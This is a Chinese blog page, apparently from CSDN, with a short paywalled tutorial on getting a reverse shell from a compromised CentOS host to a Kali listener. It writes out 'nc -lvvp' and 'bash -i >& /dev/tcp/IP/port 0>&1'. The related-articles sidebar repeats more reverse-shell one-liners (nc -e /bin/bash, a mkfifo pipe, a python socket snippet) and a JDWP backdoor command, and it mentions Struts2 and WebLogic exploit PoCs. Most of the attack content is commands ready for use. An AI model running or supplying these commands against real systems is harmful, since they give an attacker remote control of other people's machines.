反弹shell:lvvp;python;perl ;ruby ;php;lun;awk;

最新推荐文章于 2022-09-13 14:40:51 发布
VIP文章 最新推荐文章于 2022-09-13 14:40:51 发布
阅读量701 收藏 1
点赞数 4
分类专栏: 安全 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lu__xiao/article/details/121566899
版权

环境  kali  center OS 7  基于已经渗透成功

kali 的IP地址

lvvp

确定环境 可以使用  lvvp  命令去查看

kali上执行监视端口     nc -lvvp port                端口号

nc -lvvp 10000 

在center OS 上执行   bash -i >& /dev/tcp/攻击主机ip/10000 0>&1      IP地址/端口号

bash -i >& /dev/tcp/192.168.68.137/10000 0>&1

ifconfig  测试获取到的是center OS 7的ip表示成功

最低0.47元/天 解锁文章
Lu__xiao
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
基于Python实现模拟仿真数据包的发送
yujian631213952的博客
02-27 1139
基于Python实现模拟仿真数据包的发送 由于比较简单,先上代码 import socket import time def sendPacket(): endstr = "end" str = "" print('input your message,enter "end" to abort program: ') for line in iter(input, endstr): str += line + "\n" print('inpu
Linux Kali 使用笔记 【二】Netcat - TCP/IP 连接的瑞士军刀
weixin_46703850的博客
03-25 1797
【二】Netcat - TCP/IP 连接的瑞士军刀1.netstat -antp 查看开放的端口2. 打开端口 nc -lvp3. 连接端口 nc -v [IP]4.shell<1>.开放式shell<2>.反弹shell5.使用cron进行定时任务 介绍:记录学习笔记 1.netstat -antp 查看开放的端口 2. 打开端口 nc -lvp 打开端口并监听接收的信息 ┌──(root????kali)-[/home/kali] └─# nc -lvp 8080 liste
nc命令详解
10-16 508
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。nc命令详解Filed under: security
安全攻防-kali内网渗透实战
kali_Ma的博客
12-30 6361
外网打点 首先对web进行端口扫描,发现38080端口和22端口 访问一下38080端口发现是一个error page 用Wappalyzer看一下是什么架构,但是好像没有检测出来 【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线 拿着报错去百度上发现应该是springboot 索性用goby再去扫一下,应该
linux 渗透 密码,linux渗透中常用命令+Tip
weixin_42128141的博客
05-03 180
1.bashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&12. pythonattacker 监听nc -lvvp 4444victim 运行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1258
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4542
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8905
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
各种反弹shell方式
m0_58606546的博客
11-17 2268
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
CVE-2018-2893:可以直接反弹shell
04-28
CVE-2018-2893可以直接反弹shellUsage监听nc -lvvp reverse_port发送payloadpython weblogic.py target_host target_port reverse_host reverse_portReffer说明仅用于测试和交流学习,勿作他用
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
CVE-2020-17530:S2-061 的payload,以及对应简单的PoCExp
04-25
059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教struts2-061-poc.py(可执行简单系统命令)用法:python struts2-061-poc.py command例子:python struts2-061-poc.py whoamiS2-061-shell.py(可反弹shell...
C#版本EventBus事件总线实例源码-Lvvp.rar
10-18
C#版本EventBus事件总线实例源码-Lvvp.rar
Linux反弹Shell总结
qq_45600801的博客
01-06 4220
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
cmd 返回值_渗透不会反弹shell?来教你写一个cmd的shell
weixin_39756235的博客
11-20 109
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
CreateProcess 重定向CMD实现反弹shell
hambaga的博客
03-01 412
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。 // RedirectCmd.cpp : Defines the entry point for the console application. // 还原《恶意代码分析实战》第九章练习样本2 #include "stdafx.h" #include <WinSock2.h> #include <Windows.h> #pragma comment(l
反弹shell的N种姿势
热门推荐
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹shell的几种方法
stonesharp的专栏
04-13 4226
bash版本: ? 1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1   ,注意某些linux不支持   perl版本:   ? 1 2 3 4 5 pe
jdwp-shellifier
最新发布
07-28
jdwp-shellifier是一个漏洞利用脚本,用于利用Java Debug Wire Protocol (JDWP)的漏洞进行攻击。通过该脚本,攻击者可以执行命令并获取目标系统的访问权限。\[1\]脚本的使用方法包括设置目标IP和端口,以及指定要执行的命令。例如,可以使用"--cmd"参数执行命令"ping http://.`whoami`.yoww7w.dnslog.cn"来查看回显效果,或者使用"--cmd"参数执行命令"whoami"来获取当前用户的信息。\[1\]\[2\]此外,还可以使用"--cmd"参数开启一个后门,使用nc命令进行连接。例如,可以使用"--cmd"参数执行命令"ncat -lvvp 1234 -e /bin/bash"来开启一个监听端口,并使用nc进行连接。\[3\]请注意,使用jdwp-shellifier进行攻击是非法的,且可能导致严重的安全问题。建议只在合法授权的情况下使用该脚本。 #### 引用[.reference_title] - *1* *2* [JDWP漏洞验证](https://blog.csdn.net/weixin_42380348/article/details/115464387)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [java JDWP调试接口任意命令执行漏洞](https://blog.csdn.net/tangshuangsss/article/details/121987666)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值